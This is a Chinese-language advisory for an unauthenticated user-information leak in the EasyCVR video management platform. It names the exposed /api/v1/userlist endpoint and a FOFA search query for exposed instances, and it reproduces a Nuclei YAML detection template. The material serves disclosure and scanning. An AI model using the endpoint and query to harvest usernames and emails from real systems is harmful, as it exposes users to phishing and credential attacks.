EasyCVR 用户信息泄露漏洞

漏洞信息

漏洞名称： EasyCVR 用户信息泄露漏洞

漏洞类型： 信息泄露

漏洞等级： 中危

漏洞描述： EasyCVR视频管理平台是一款广泛应用于视频监控管理的软件，支持多种视频流的接入、转码、存储和分发，常用于企业级监控系统、智能安防等领域。由于其广泛的应用，该平台的安全性尤为重要。本次发现的漏洞属于信息泄露类型，具体表现为通过未授权的API端点/api/v1/userlist?pageindex=0&pagesize=10可以获取到用户的敏感信息，包括用户名和电子邮件地址。这种漏洞的根源在于平台未能对敏感信息的访问实施严格的权限控制，导致攻击者无需认证即可访问这些数据。此漏洞的存在可能导致用户隐私泄露，攻击者可以利用这些信息进行进一步的攻击，如钓鱼攻击或暴力破解。由于漏洞的利用无需认证，且可以通过自动化工具批量检测和利用，因此对受影响系统的安全构成了中等程度的威胁。

产品厂商： EasyCVR

产品名称： EasyCVR Video Management Platform

搜索语法： title=”EasyCVR”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/0ced7df9001f04c4b40b963dc050f767598d2332/easycvr-user-info-leak.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: easycvr-user-info-leak

info:
  name: EasyCVR User Information Disclosure
  author: ProjectDiscoveryAI,dostghost
  severity: medium
  description: |
    The EasyCVR Video Management Platform is vulnerable to user information leakage. This template checks for exposed user information through the endpoint `/api/v1/userlist?pageindex=0&pagesize=10`.
  reference:
    - https://github.com/AboSteam/POPC/blob/main/EasyCVR%20%E8%A7%86%E9%A2%91%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8%E7%94%A8%E6%88%B7%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
  metadata:
    fofa-query: title="EasyCVR"
  tags: information-disclosure,easycvr

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/userlist?pageindex=0&pagesize=10"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "userName"
          - "email"